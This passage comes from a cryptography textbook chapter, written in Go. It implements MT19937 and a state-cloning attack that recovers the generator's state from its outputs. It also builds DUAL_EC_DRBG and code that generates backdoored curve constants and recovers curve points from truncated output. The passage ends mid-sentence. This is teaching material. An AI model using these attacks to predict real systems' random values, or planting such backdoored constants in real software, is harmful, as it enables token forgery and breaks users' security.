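func mersenne(n int64) *big.Int {
	m := new(big.Int).Lsh(big.NewInt(1), uint(n))
	return m.Sub(m, big.NewInt(1))
}

func main() {
	// Small Mersenne primes: M2 = 3, M3 = 7, M5 = 31, M7 = 127.
	for _, n := range []int64{2, 3, 5, 7} {
		fmt.Printf("M%d = %s\n", n, mersenne(n))
	}
	// The prime behind MT19937 is far too large to print in full:
	// its decimal expansion runs to 6002 digits.
	fmt.Println(len(mersenne(19937).String()), "digits")
}
```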

3.1.1 Implementing MT19937
The first RNG that we will attack with code is known as MT19937, where MT is the
abbreviation for Mersenne Twister. MT19937 is a specific type of Mersenne Twister that
relies on the prime number 2^19937 − 1. MT19937 is not a CSPRNG by a long shot and
was not intended to be used in cryptographic applications, but it is interesting to us for two
reasons:
It provides a very good practical example of how RNGs are broken.
Its usage as a general-purpose RNG is pervasive enough in common programming
languages and libraries that it is important to understand what makes it weak and why
it should be avoided.
Let’s start by creating a new type in listing 3.1 with enough space to hold N integers.
We also keep track of an index which points to the next element of the state that will be
generated as the output.

Listing 3.1 ch03/mt19937/impl_mt19937/impl_mt19937.go

27 type MT19937 struct {
28 index uint32
29 state [N]uint32
30 }
31
32 func NewMT19937() *MT19937 {
33 return &MT19937{
34 index: 0,
35 state: [N]uint32{},
36 }
37 }
38
39 func NewMT19937WithState(state [N]uint32) *MT19937 {
40 return &MT19937{
41 index: 0,
42 state: state,
43 }
44 }

We can now tackle initialization of the internal state based on a seed value x0 . This is
equivalent to the Init(Seed) function in figure 3.1. The initialization function sets N
values of x according to the formula shown in equation 3.1, where i starts from 0 and runs
up to N − 1.

x_i = f × (x_{i−1} ⊕ (x_{i−1} ≫ (w − 2))) + i (3.1)

Each implementation of Mersenne Twister-based RNGs relies on a handful of constants.
In the case of MT19937, these constants are given in listing 3.2. 2 For our exploit
it’s not important to understand the underlying mathematical theory behind how these
constants were selected. The three constants we have encountered so far are f and w in
equation 3.1 as well as N which dictates that the internal state of our MT19937 RNG will
consist of 624 numbers. The RNG increments index each time it generates an output and
once it has done so 624 times it refreshes the entire state to generate a new collection of
624 values.

Listing 3.2 ch03/mt19937/impl_mt19937/impl_mt19937.go

3 const (
4 W uint32 = 32 // w in equation 3.1
5 N uint32 = 624 // the MT19937 state in listing 3.1 consists of 624 integers
6 M uint32 = 397
7 R uint32 = 31
8
9 A uint32 = 0x9908B0DF
10 F uint32 = 1812433253 // f in equation 3.1
11
12 U uint32 = 11
13 D uint32 = 0xFFFFFFFF
14
15 S uint32 = 7
16 B uint32 = 0x9D2C5680
17
18 T uint32 = 15
19 C uint32 = 0xEFC60000
20
21 L uint32 = 18
22
23 LowerMask uint32 = 0x7FFFFFFF
24 UpperMask uint32 = 0x80000000
25 )

2 Mersenne Twister. https://en.wikipedia.org/wiki/Mersenne_Twister
We can now use these constants to implement equation 3.1 in listing 3.3. The mt.state
array holds N (624) values that represent the internal state (x0 , x1 , x2 , ..., x623 ).

Listing 3.3 ch03/mt19937/impl_mt19937/impl_mt19937.go

46 func (mt *MT19937) Seed(seed uint32) {
47 mt.index = 0
48 mt.state[0] = seed
49 for i := uint32(1); i < N; i++ {
50 mt.state[i] = (F*(mt.state[i-1]^(mt.state[i-1]>>(W-2))) + i)
51 }
52 }

MT19937 defines a Temper(x) function that takes a single xi and “tempers” the input
to generate a transformed output. This is similar to the Output(StateN ) function in figure
3.1, and it should be hard to reverse. Listing 3.4 implements the temper function in Go. It
utilizes some more constants from the ones we defined in listing 3.2. As we will see in the
upcoming section on exploiting our RNG, the reversibility of the Temper(x) function plays
a huge role in making MT19937 insecure. It transforms y to output y4 by performing
some complicated bit-manipulation on it but all of the operations are easily reversible for
an adversary regardless of their complexity.

Listing 3.4 ch03/mt19937/impl_mt19937/impl_mt19937.go

75 func temper(y uint32) uint32 {
76 y1 := y ^ (y>>U)&D
77 y2 := y1 ^ (y1<<S)&B
78 y3 := y2 ^ (y2<<T)&C
79 y4 := y3 ^ (y3 >> L)
80 return y4
81 }

After seeding and generating the first 624 values the MT19937 will have exhausted its
internal state. At that point, it defines another function called Twist(state) which takes an
existing state of 624 values and generates new 624 values to be used as the next state. This
is equivalent to the Next(StateN ) function in figure 3.1. The twist() function shown
in listing 3.5 loops from 0 to N-1 and updates each element of the state by following
some more bit manipulation techniques. The attacker does not need to understand the
details behind why the bit manipulation is done the way it is; their only goal is to reverse
the manipulations, which we will do in the upcoming section. The important thing to keep
in mind is that twist() will transform the current state of 624 values to generate a new
internal state with the same cardinality (i.e., exactly 624 values as before) but an entirely
new batch of numbers. The twist() function also relies on some of the constants listed
in listing 3.2.

Listing 3.5 ch03/mt19937/impl_mt19937/impl_mt19937.go

63 func (mt *MT19937) twist() {
64 for i := uint32(0); i < N; i++ {
65 x := (mt.state[i] & UpperMask) + (mt.state[(i+1)%N] & LowerMask)
66 xA := x >> 1
67 if x%2 == 1 {
68 xA ^= A
69 }
70 mt.state[i] = mt.state[(i+M)%N] ^ xA
71 }
72 mt.index = 0
73 }

We can now combine our temper(y) and twist() functions to write code for generating
random numbers. The Generate() function shown in listing 3.6 takes the next element
in the state pointed to by mt.index and outputs it after running it through temper(y).
Once mt.index runs its course of 624 values, the state is refreshed by calling mt.twist() on
line 56.

Listing 3.6 ch03/mt19937/impl_mt19937/impl_mt19937.go

54 func (mt *MT19937) Generate() uint32 {
55 if mt.index == 0 {
56 mt.twist()
57 }
58 y := temper(mt.state[mt.index])
59 mt.index = (mt.index + 1) % N
60 return y
61 }

To test our implementation we seed it with a fixed value and test the output against a
sequence generated by a reference implementation (you can use std::mt19937 in C++ to
generate these values). The code for this test is shown in listing 3.7.

Listing 3.7 ch03/mt19937/impl_mt19937/impl_mt19937_test.go

7 func TestMT19937WithDefaultSeed(t *testing.T) {
8 mt := NewMT19937()
9 mt.Seed(5489)
10
11 expected := []uint32{
12 3499211612,
13 581869302,
14 3890346734,
15 3586334585,
16 545404204,
17 4161255391,
18 3922919429,
19 949333985,
20 2715962298,
21 1323567403,
22 418932835,
23 2350294565,
24 1196140740,
25 }
26
27 for i := 0; i < len(expected); i++ {
28 if r := mt.Generate(); r != expected[i] {
29 t.Fatalf("Generated: %d, Expected %d.", r, expected[i])
30 }
31 }
32 }

You should run the test yourself by executing make mt19937 in the accompanying code
repository. We now have a working implementation of MT19937 that we can exploit.

3.1.2 Exploiting MT19937
Let us start by writing a function to test our exploit. The test will fail for now but will
help us understand the flow of the exploit. In listing 3.8 we define a test that creates an
instance of MT19937 on line 8 using the implementation from the previous section. On
line 9 we seed this RNG using the current UNIX time (number of seconds passed since
the Unix Epoch on January 1st, 1970). Seeding a PRNG with time is a horrible practice
for production software as the seed is easily guessable for an attacker – the right practice is
to seed the PRNG with the output of a hardware RNG – but it is okay for testing purposes.
On line 11 we clone the RNG just like we did for the linear-congruential generator ex-
ample in the previous chapter. We will look at the implementation of CloneMT19937() in a
moment, but the important thing to note is that this function is defined in the exploit_mt19937
package which is different from the impl_mt19937 package and hence cannot access the
internal state of our MT19937 struct that we defined earlier in listing 3.1.
Coming back to listing 3.8 we then generate 100 values using the newly cloned RNG
and compare them to the output generated by the original RNG using the loop defined on
lines 13 - 22. If there is a mismatch for any value we fail the test, otherwise, we print the
values once every twenty iterations just to let us know things are coming along smoothly.

Listing 3.8 ch03/mt19937/exploit_mt19937/exploit_mt19937_test.go

7 func TestCloneMT19937(t *testing.T) {
8 originalRng := impl_mt19937.NewMT19937()
9 originalRng.Seed(uint32(time.Now().Unix()))
10
11 clonedRng := CloneMT19937(originalRng) // CloneMT19937 does not have access to originalRng.state
12
13 for i := 0; i < 100; i++ {
14 cloned := clonedRng.Generate()
15 observed := originalRng.Generate()
16 if observed != cloned {
17 t.Fatalf("observed: %08x, cloned: %08x", observed, cloned)
18 }
19 if i%20 == 0 {
20 t.Logf("observed: %08x, cloned: %08x", observed, cloned)
21 }
22 }
23 }

The bulk of the exploit work is carried out by the CloneMT19937(mt) function which
takes an MT19937 RNG as input and clones it strictly by observing its output. The goal
of this function is to generate values using the original RNG while somehow reversing
its internal state just by using the observed values, and then use the recovered state to
construct a cloned RNG.
Listing 3.9 shows our attack function. It generates N values using the original RNG.
Each number in the internal state of the original RNG corresponds to exactly one generated
value, albeit not directly. The RNG algorithm picks a number from the internal
state and transforms it using the temper(y) function. To recover the original state we call
an untemper(y) function on line 34 that will reverse this transformation. Once we have
recovered the entire state of the original RNG by “untempering” N generated values we
can construct a new RNG with this state and return that as the result of our RNG cloning
attack.

Listing 3.9 ch03/mt19937/exploit_mt19937/exploit_mt19937.go

31 func CloneMT19937(mt *impl_mt19937.MT19937) *impl_mt19937.MT19937 {
32 var recoveredState [impl_mt19937.N]uint32
33 for i := uint32(0); i < impl_mt19937.N; i++ {
34 recoveredState[i] = untemper(mt.Generate())
35 }
36 return impl_mt19937.NewMT19937WithState(recoveredState)
37 }

It is finally time to tackle the untempering that lies at the heart of our attack. In the
previous section we defined temper(y) in listing 3.4, which did some bit twiddling to go
from y → y1 → y2 → y3 → y4 and then returned y4. Our untemper(y) therefore needs to
go in the other direction, i.e., from y4 → y3 → y2 → y1 → y, and then return the recovered
y. This is visualized in figure 3.2.

Figure 3.2 Attacker observes PRNG output and reverses operations to recover PRNG state.

Our goal is to build an intuition of how the bitwise operations are reversed. The good
news is that each step (e.g., from y2 to y3) looks pretty similar, i.e., it involves one XOR
operation (the ^ symbol), one bitwise shift operation (in the left or right direction, denoted
by << and >> respectively) and one bitwise AND operation denoted by &. For example, when
the original RNG is tempering values it calculates y2 from y1 using the line shown in listing
3.10.
Listing 3.10 XOR-Shift-AND in MT19937’s temper(y) function

y2 := y1 ^ (y1<<S)&B

To understand how the reversal works, let’s look at individual bits, starting from the
original 32 bits of y1 as shown in figure 3.3.

Figure 3.3 The “original” bits of y1 (4 bytes total)

The first transformation that takes place is the one specified inside the brackets, i.e., (y1
<< S). Since S is defined as a constant in listing 3.2, we can visualize this operation as shown
in figure 3.4.

Figure 3.4 y1 << S where S = 0x07.

The next step is to perform a bitwise AND between y1 << S (figure 3.4) and the constant
B. The individual bits of B are shown in figure 3.5.

Figure 3.5 B = 0x9D2C5680

After performing the bitwise AND between figures 3.4 and 3.5 we end up with figure
3.6. Please note that the set bits of B let the corresponding bits of figure 3.4 pass through,
while its zero bits clear them, which is a fundamental property of bitwise AND.

Figure 3.6 (y1 << S) & B

The final step for transforming y1 into y2 is to XOR the result of figure 3.6 with the
original y1, giving us figure 3.7, which is equivalent to y2.
If you look at figure 3.7 closely you will notice that y2 retains a lot of information about
y1. In fact, if we start from the right-hand side and scan to the left, we will see
that the first 7 bits correspond exactly to the bits of y1. That is, bit 0 of y1 is equal to bit 0 of
y2, bit 1 of y1 is equal to bit 1 of y2, and so on, all the way up to the seventh bit from the right (bit 6).
Figure 3.7 y2 = y1 ^ (y1 << S) & B

The eighth bit is a little tricky. Instead of being simply bit 7 of y1, it is equal to bit 7 of
y1 XOR'ed with bit 0 of y1.
Here’s where we are in luck, as we do know bit 0 of y1. In fact, we can imagine recovering y1
from y2 as building a bridge, starting from the right-hand side and moving stepwise to the
left. For the first few bits we simply pick the corresponding y2 bit to lay the next brick for
our bridge. When we reach the eighth bit we need to find out bit 7 of y1, but it has been XOR’ed
with bit 0 of y1. We have already laid the bit-0 brick by this point, so we can use that value to XOR
again and cancel it out, leaving behind the bit 7 of y1 that we needed to recover.
This process is visualized in figure 3.8. The first 7 bits of y2 (from the right, i.e., the least-significant
bits) are mapped straightforwardly to y1, while the “garbled” bits are recovered
by leveraging earlier recovered bits from the right.

Figure 3.8 Right-to-left recovery of 14 bits of y1 from y2

We do not need to look at each bit being recovered to understand the attack. The main
intuition stays the same throughout the process: we reverse the bitwise operations one
by one and use earlier recovered bits to aid in calculating more bits. The complete code
for untempering y from y4 is shown in listing 3.11. Lines 15 - 24 show how we “build
the bridge” from right to left for recovering y1 from y2. Please note that the direction
of the bitwise shift operation is reversed between tempering and untempering for each
corresponding recovery.
Listing 3.11 ch03/mt19937/exploit_mt19937/exploit_mt19937.go

7 func untemper(y4 uint32) uint32 {
8 // recover y3 from y4
9 y3 := y4 ^ (y4 >> impl_mt19937.L)
10
11 // recover y2 from y3
12 y2 := y3 ^ (y3<<impl_mt19937.T)&impl_mt19937.C
13
14 // recover y1 from y2
15 y2_0 := y2 << impl_mt19937.S
16 y2_1 := y2 ^ (y2_0 & impl_mt19937.B)
17 y2_2 := y2_1 << impl_mt19937.S
18 y2_3 := y2 ^ (y2_2 & impl_mt19937.B)
19 y2_4 := y2_3 << impl_mt19937.S
20 y2_5 := y2 ^ (y2_4 & impl_mt19937.B)
21 y2_6 := y2_5 << impl_mt19937.S
22 y2_7 := y2 ^ (y2_6 & impl_mt19937.B)
23 y2_8 := y2_7 << impl_mt19937.S
24 y1 := y2 ^ (y2_8 & impl_mt19937.B)
25
26 // recover y from y1
27 y1_0 := y1 >> impl_mt19937.U
28 y1_1 := y1 ^ y1_0
29 y1_2 := y1_1 >> impl_mt19937.U
30 y := y1 ^ y1_2
31
32 return y
33 }
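A quick way to convince ourselves that untemper(y) really inverts temper(y) is a round-trip check. The standalone sketch below is our own illustration: the constants are copied from listing 3.2, and the loops are a compact, iterative form of the unrolled recovery steps in listing 3.11.

```go
package main

import "fmt"

// MT19937 tempering constants from listing 3.2.
const (
	U uint32 = 11
	D uint32 = 0xFFFFFFFF
	S uint32 = 7
	B uint32 = 0x9D2C5680
	T uint32 = 15
	C uint32 = 0xEFC60000
	L uint32 = 18
)

// temper is the forward transformation from listing 3.4.
func temper(y uint32) uint32 {
	y1 := y ^ (y>>U)&D
	y2 := y1 ^ (y1<<S)&B
	y3 := y2 ^ (y2<<T)&C
	return y3 ^ (y3 >> L)
}

// untemper reverses temper. The single-step reversals work because L >= 16
// and C's low 17 bits are zero; the loops iteratively rebuild the remaining
// bits from right to left (the "bridge" from figure 3.8).
func untemper(y4 uint32) uint32 {
	y3 := y4 ^ (y4 >> L)
	y2 := y3 ^ (y3<<T)&C
	y1 := y2
	for i := 0; i < 4; i++ { // each pass fixes 7 more low-order bits
		y1 = y2 ^ (y1<<S)&B
	}
	y := y1
	for i := 0; i < 2; i++ { // each pass fixes 11 more high-order bits
		y = y1 ^ (y>>U)&D
	}
	return y
}

func main() {
	// Every 32-bit sample should survive a temper/untemper round trip.
	for _, y := range []uint32{0, 1, 0xDEADBEEF, 0x12345678, 0xFFFFFFFF} {
		fmt.Println(untemper(temper(y)) == y) // each line prints true
	}
}
```

Since temper is a bijection on 32-bit integers, a handful of spot checks like this (or an exhaustive sweep, which takes seconds) demonstrates the reversibility that makes MT19937 cloneable.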

Let’s execute our tests using make mt19937:

Listing 3.12 Output for make mt19937

go test -v ./ch03/mt19937/exploit_mt19937
=== RUN TestCloneMT19937
exploit_mt19937_test.go:22: observed: bcc1df92, cloned: bcc1df92
exploit_mt19937_test.go:22: observed: d0d8875f, cloned: d0d8875f
exploit_mt19937_test.go:22: observed: d0f264cc, cloned: d0f264cc
exploit_mt19937_test.go:22: observed: 374635d9, cloned: 374635d9
exploit_mt19937_test.go:22: observed: bc6d6cc3, cloned: bc6d6cc3
--- PASS: TestCloneMT19937 (0.00s)
PASS
ok github.com/krkhan/crypto-impl-exploit/ch03/mt19937/exploit_mt19937
0.029s

We successfully cloned a PRNG just by observing its generated values, without ever
having access to the internal state of the original RNG. Now we can “predict” any values
that are going to be generated by the original generator. We were able to accomplish this
because MT19937’s equivalent of the Output(StateN) operation in figure 3.1 is easily
reversible.
3.2 Implementing and exploiting Dual Elliptic Curve Deterministic Random Bit Generator
We saw how to implement and reverse the MT19937 PRNG. Our next example is one of
the most famous CSPRNGs – albeit for some pretty unfortunate reasons.
DUAL_EC_DRBG stands for Dual Elliptic Curve Deterministic Random Bit Generator.
For nine years, between 2006 and 2015, it was one of the four CSPRNGs recommended
by NIST in the SP 800-90A standard.3
The algorithm (much like the LCG and MT19937 generators we covered earlier)
relies on some mathematical constants. It is possible that the constants recommended by
NIST contained a backdoor that allowed the NSA (National Security Agency) to clone any
DUAL_EC_DRBG instance after observing just a couple of generated values – even though
the algorithm is supposed to be cryptographically secure!
We cannot conclusively ascertain that the constants recommended by NIST did contain
a backdoor; instead, we will see how such constants can be picked in a way that makes
the algorithm exploitable. In other words, we will learn how, if we were the ones
recommending constants for DUAL_EC_DRBG, we could pick them in a way that would allow
us to predict the generator’s future values after observing its output.
Before we implement DUAL_EC_DRBG, though, we need to learn about some building
blocks, starting with big numbers.

3.2.1 Building block for DUAL_EC_DRBG: Big numbers


Integers on computer systems usually have limits. For example, an unsigned 32-bit integer
can hold a maximum value of 4294967295. In cryptographic algorithms, we usually need
to perform mathematical operations on numbers much larger than that. We regularly end
up working with numbers that are much larger than the number of atoms in the universe.
We, therefore, need something that can perform computations on arbitrary-length integers.
This is simple in Python, where all integers are “bignums” (short for big numbers –
which have nothing to do with big brother, big pharma or big insurance; except in terms
of quarterly revenues). In Go we need to rely on the math/big package for performing
arbitrary-precision arithmetic operations. The example below is taken from the official
documentation of math/big; it calculates the smallest Fibonacci number with 100 digits.
The Fibonacci numbers are the sequence defined by the linear recurrence equation Fn =
Fn−1 + Fn−2 where F1 = 1 and F0 = 0. The first few Fibonacci numbers are 0, 1, 1, 2, 3, 5,
8, 13, 21, 34, 55, 89 and so forth. In listing 3.13 we use bignum integers to calculate
the first Fibonacci number that is larger than 10^99.

Listing 3.13 Calculating the smallest Fibonacci number with 100 digits

1 package main
2
3 import (
4   "fmt"
5   "math/big"
6 )
7
8 func main() {
9   a := big.NewInt(0)
10  b := big.NewInt(1)
11
12  var limit big.Int
13  limit.Exp(big.NewInt(10), big.NewInt(99), nil)
14
15  for a.Cmp(&limit) < 0 {
16    a.Add(a, b)    // This is equivalent to a = a + b
17    a, b = b, a    // This simply swaps a and b
18  }
19  fmt.Println(a)
20 }

3 Special Publication 800-90. (2006). NIST. https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-90.pdf

Running this program will print a really large number (it’s a 100-digit number that has
been broken over two lines here for presentation).

Listing 3.14 Smallest Fibonacci number larger than 10^99

13447196675861531814197166417245678868908506962757
67987106294472017884974410332069524504824747437757

As you can see, this number is much larger than what we can store in 32 (or even 64)
bits. The big package, however, handles it easily because it can work with arbitrary-
precision integers.

3.2.2 Building block for DUAL_EC_DRBG: Elliptic curves


Another very important mathematical construct that is used widely in cryptography – and
specifically by the DUAL_EC_DRBG algorithm – is “elliptic curves”. We will encounter
them many times throughout this book. They are defined by equation 3.2.

y² = x³ + ax + b    (3.2)
Some example plots are shown in figure 3.9 for various values of a and b:
Go comes with the crypto/elliptic package, which can be used to perform operations
on elliptic curves. We will cover elliptic curves in more detail in later chapters. For the
time being, the important things to understand are:
An elliptic curve is a set of points defined by equation 3.2.
For a given curve, addition can be performed between any two points P and Q. The
result P + Q will also lie on the curve. An analogy can be drawn with modular arithmetic
by saying that if z = (x + y) mod n then z is also an integer that is less than n, just like
x and y. The operation does not involve simply numerically adding the respective
coordinates, as that would result in a point somewhere outside of the curve. For elliptic
curves + denotes a special operation that satisfies various properties we need (e.g.,
P + Q = Q + P). We do not need to worry about the details of that operation right now,
as the curve.Add(...) function in Go’s crypto/elliptic package will take care of
it for us.

Figure 3.9 Some example elliptic curves obtained by plotting equation 3.2 for different values of a and b.
For a given curve, scalar multiplication can be performed on its points, where a
point (x, y) is multiplied by a single integer. The result of this operation is also a
point on the same curve. This is denoted by nP, meaning P should be “added” (using the
special elliptic curve operation) to itself n times to generate the result. In the
crypto/elliptic package this is provided by the curve.ScalarMult(...) function.
The crypto/elliptic package uses arbitrary-precision integers provided by the math/big
package (explained in the previous section) to represent individual coordinates, which
makes it perfectly suited for our cryptographic needs. The package comes with a set of
standard curves that are widely used in cryptographic applications. We will use one of
these curves (known as P256) to implement DUAL_EC_DRBG.

3.2.3 Implementing DUAL_EC_DRBG


DUAL_EC_DRBG depends on two points P and Q, shown in listing 3.15. These are
logically similar to the constants we saw in the preceding generators, i.e., implementations
use these constants to standardize their behavior. The NIST specification for
DUAL_EC_DRBG provides fixed values for these points. Please note that each coordinate is 32 bytes long.

Listing 3.15 ch03/dual_ec_drbg/impl_dual_ec_drbg/impl_dual_ec_drbg.go

10 const (
11   Px = "6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296"
12   Py = "4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5"
13   Qx = "c97445f45cdef9f0d3e05e1e585fc297235b82b5be8ff3efca67c59852018192"
14   Qy = "b28ef557ba31dfcbdd21ac46e2a91e3c304f44cb87058ada2cb815151e610046"
15 )

The generation algorithm depends on two functions gP(x) and gQ(x). These correspond
to Next(...) and Output(...) in figure 3.10 respectively.

Figure 3.10 gP(x) advances the state, gQ(x) transforms it before generating an output value.

The internal state of DUAL_EC_DRBG consists of just one bignum. The definitions
of gP(x) and gQ(x) rely on scalar multiplication of this bignum with the points P
and Q respectively. The result of the scalar multiplication is not, however, used directly.
Instead, two helper functions are applied:
X(x, y) = x; discards the y coordinate and returns just the x coordinate.
t(x); returns the 30 least significant bytes of x. In other words, it “truncates” the input
to 30 bytes.
If the internal state (the single bignum) is denoted by n, gP(x) and gQ(x) are defined
as shown in equation 3.3.

gP(n) = X(nP)
gQ(n) = t(X(nQ))    (3.3)

Equation 3.3 can be read as “to advance the RNG, perform scalar multiplication of the point
P with the internal state n and store the X-coordinate as the new state”. Similarly, the second
line can be read as “to generate a new value, perform scalar multiplication of the point Q with the
internal state and truncate the X-coordinate of the result to 30 bytes before outputting it as the next
random number”. In terms of our understanding of PRNG operation in figures 3.1 and 3.10
we can write the Next(...) and Output(...) functions as shown in equation 3.4.

Next(StateN) = gP(StateN−1)
Output(StateN) = gQ(StateN)    (3.4)

The actual code for generating the numbers is pretty minimal thanks to the crypto/elliptic
package doing most of the heavy lifting. We start by defining a type that represents a point
on the curve. When creating a new Point, we take two strings as input representing the x
and y coordinates. We then use big.Int to parse these strings and (if they are valid
inputs) store them as two bignums (one for each coordinate). This is shown in listing 3.16.

Listing 3.16 ch03/dual_ec_drbg/impl_dual_ec_drbg/impl_dual_ec_drbg.go

10 type Point struct {
11   X *big.Int
12   Y *big.Int
13 }
14
15 func NewPoint(x, y string) (*Point, error) {
16   xb, ok := new(big.Int).SetString(x, 16)
17   if !ok {
18     return nil, errors.New("invalid x")
19   }
20
21   yb, ok := new(big.Int).SetString(y, 16)
22   if !ok {
23     return nil, errors.New("invalid y")
24   }
25
26   return &Point{
27     X: xb,
28     Y: yb,
29   }, nil
30 }
31
32 func (p1 *Point) Cmp(p2 *Point) bool {
33   // For big.Int, a.Cmp(b) equals 0 when a == b
34   return p1.X.Cmp(p2.X) == 0 && p1.Y.Cmp(p2.Y) == 0
35 }

As we discussed before, the internal state of our DUAL_EC_DRBG generator consists
of a single bignum. Let’s define a new type to hold this state as well as the two “generator”
points that shall be used for multiplication, as shown in listing 3.17.

Listing 3.17 ch03/dual_ec_drbg/impl_dual_ec_drbg/impl_dual_ec_drbg.go

44 type DualEcDrbg struct {
45   state *big.Int
46   p *Point
47   q *Point
48 }
49
50 func NewDualEcDrbg(p *Point, q *Point) (*DualEcDrbg, error) {
51   if p == nil {
52     return nil, errors.New("invalid point p")
53   }
54   if q == nil {
55     return nil, errors.New("invalid point q")
56   }
57
58   return &DualEcDrbg{
59     state: nil,
60     p: p,
61     q: q,
62   }, nil
63 }
64
65 func (drbg *DualEcDrbg) Seed(seed *big.Int) {
66   drbg.state = seed
67 }

We can now implement the RNG operations defined in equation 3.4 in a Generate()
function, as shown in listing 3.18.

Listing 3.18 ch03/dual_ec_drbg/impl_dual_ec_drbg/impl_dual_ec_drbg.go

69 func (drbg *DualEcDrbg) Generate() []byte {
70   if drbg.state == nil {
71     seed := new(big.Int).SetInt64(time.Now().Unix())
72     drbg.Seed(seed)
73   }
74
75   curve := elliptic.P256()
76   // Discard the y-coordinate
77   drbg.state, _ = curve.ScalarMult(drbg.p.X, drbg.p.Y, drbg.state.Bytes())
78   // Discard the y-coordinate
79   qMulResult, _ := curve.ScalarMult(drbg.q.X, drbg.q.Y, drbg.state.Bytes())
80
81   // Truncate and return 30 bytes
82   qMulResultBytes := qMulResult.Bytes()
83   qMulResultLen := len(qMulResultBytes)
84   return qMulResultBytes[qMulResultLen-30:]
85 }

And that’s it! We now have a fully functional DUAL_EC_DRBG that we can exploit
in the next section.

3.2.4 Exploiting DUAL_EC_DRBG


DUAL_EC_DRBG can be exploited if the two generator points it uses are mathematically
related. Both gP(x) and gQ(x) act on the same input x (the internal state of the RNG). This
allows an attacker to observe the output of the gQ function and calculate the output of gP
by exploiting a secret relationship between P and Q. We do not need to actually reverse
gQ(x); instead, we will leverage the mathematical relationship between P and Q to calculate
the result gP(x) would produce when acting upon the same x.
To simplify our discussion, let us denote the Nth state and output by sN and oN respectively.
Our values then look like equation 3.5.

s0 = Seed
o0 = t(X(s0Q))
s1 = X(s0P)    (3.5)
o1 = t(X(s1Q))

Can we predict o1 just by observing o0? If P and Q are related such that P = dQ, then
we can multiply s0Q by d to get s0P, as shown in equation 3.6, which really constitutes
the heart of our attack on DUAL_EC_DRBG.

d(s0Q) = s0P    (3.6)

Once we have s0P we’ll essentially have recovered the next state s1, which means we can
now clone any output from this RNG. If P and Q were not related, there would have been
no way to observe o0 and somehow deduce s1. The flow of the attack is shown in figure
3.11.

Figure 3.11 Attacker observes Output0 and calculates State1 using the secret relationship between P
and Q

The first hurdle for our attack is to recover the point s0Q from the observed output o0. We
know that the output o0:
Has had the Y-coordinate of the original point s0Q discarded by the X() function.
Has had even the remaining X-coordinate truncated to 30 bytes.
Let’s think about how to reverse both of these transformations. If a point lies on a curve (or,
in other words, satisfies its equation) we can calculate the Y-coordinate simply by plugging
the X-coordinate into the equation. This is analogous to looking up the stock price of a
symbol at a particular time. The stock price is the Y-coordinate with time running along
the X-axis; the statement "stock price of XYZ when the market closed yesterday" holds just
as much information as giving you the Y-coordinate value itself, because the curve (i.e.,
which company’s plot we are tracking) and the point in time (the X-coordinate) suffice
to convey the actual point on the plot.
The problem is, we do not have the entire X-coordinate. The original X-coordinate
was 32 bytes long; the output function discarded 2 bytes and gave us 30 of them. How can
we get the 2 missing bytes?
It turns out we can kill two birds with one stone here! We can simply try all possible
values for those two bytes, i.e., from 0000 to FFFF in hexadecimal, and see if any of them
satisfy our elliptic curve equation 3.2, repeated here again for the reader’s
convenience.

y² = x³ + ax + b
y = √(x³ + ax + b)    (3.7)

When we try all the possible values for the missing 2 bytes of our X-coordinate,
only the correct guess will satisfy equation 3.7. Every guessed value of x will produce some
value when plugged into the right-hand side of the equation, but only the correct value
will have an actual square root! Not only can we identify the right X-coordinate using the
equation, it will also handily give us the Y-coordinate for continuing our attack.
Listing 3.19 shows the code for calculating the Y-coordinate for a guessed X-coordinate.
In case of a wrong guess, our calculation of the square root will fail at line 43. The
calculations for our coordinates require us to pick a curve (i.e., a set of values for a and b)
for evaluating equation 3.7. We do this by using a standard curve called P256 on line 36.

Listing 3.19 ch03/dual_ec_drbg/exploit_dual_ec_drbg/exploit_dual_ec_drbg.go

35 func CalculateYCoordinate(x *big.Int) (*big.Int, error) {
36   curve := elliptic.P256()
37   xCube := new(big.Int).Exp(x, new(big.Int).SetInt64(3), curve.Params().P)
38   ax := new(big.Int).Mul(new(big.Int).SetInt64(-3), x)
39   xCubePlusAx := new(big.Int).Add(xCube, ax)
40   xCubePlusAx = new(big.Int).Mod(xCubePlusAx, curve.Params().P)
41   xCubePlusAxPlusB := new(big.Int).Add(xCubePlusAx, curve.Params().B)
42   xCubePlusAxPlusB = new(big.Int).Mod(xCubePlusAxPlusB, curve.Params().P)
43   y := new(big.Int).ModSqrt(xCubePlusAxPlusB, curve.Params().P)
44   if y == nil {
45     return nil, errors.New("not a valid point")
46   }
47   ySquared := new(big.Int).Exp(y, new(big.Int).SetInt64(2), curve.Params().P)
48   if ySquared.Cmp(xCubePlusAxPlusB) != 0 {
49     return nil, errors.New("not a valid point")
50   }
51   if !curve.IsOnCurve(x, y) {
52     return nil, errors.New("not a valid point")
53   }
54
55   return y, nil
56 }
The question now is: how do we generate two points P and Q that have this secret
relationship, allowing us to compromise DUAL_EC_DRBG? Standard elliptic curves
such as P256 have a fixed point P that is known as the “base point”. Since we want to satisfy
equation 3.6, we need to find a corresponding point Q such that:

P = dQ    (3.8)

Since P is fixed on the left-hand side by the standard curve definition itself, we have
to find a Q that satisfies this relationship. We cannot just pick a random point Q, because
we would then have no way of knowing the secret scalar d that ties it to P. Instead, we
start by picking a random (scalar) value for d. We then find the modular inverse of d and
call it e. Now we can multiply both sides by e to get equation 3.9.

eP = edQ
eP = Q    (3.9)

Instead of randomly picking a point Q and multiplying it by a random scalar d to get
a secretly related P, we went the other way around. The point P was fixed by the P256 curve;
we generated a random scalar d, found its modular inverse, and used that to calculate a
backdoor-ed point Q. The code for finding the backdoor-ed constants is shown in listing
3.20.

Listing 3.20 ch03/dual_ec_drbg/exploit_dual_ec_drbg/exploit_dual_ec_drbg.go

16 func GenerateBackdoorConstants() (*impl_dual_ec_drbg.Point, *impl_dual_ec_drbg.Point, *big.Int) {
17   rnd := rand.New(rand.NewSource(time.Now().Unix()))
18   curve := elliptic.P256()
19   n := curve.Params().N
20   d := new(big.Int).Rand(rnd, n)
21   e := new(big.Int).ModInverse(d, n)
22   px, py := curve.Params().Gx, curve.Params().Gy
23   qx, qy := curve.ScalarMult(px, py, e.Bytes())
24   return &impl_dual_ec_drbg.Point{
25     X: px,
26     Y: py,
27   }, &impl_dual_ec_drbg.Point{
28     X: qx,
29     Y: qy,
30   }, d
31 }

We can now combine our GenerateBackdoorConstants() and CalculateYCoordinate(...)
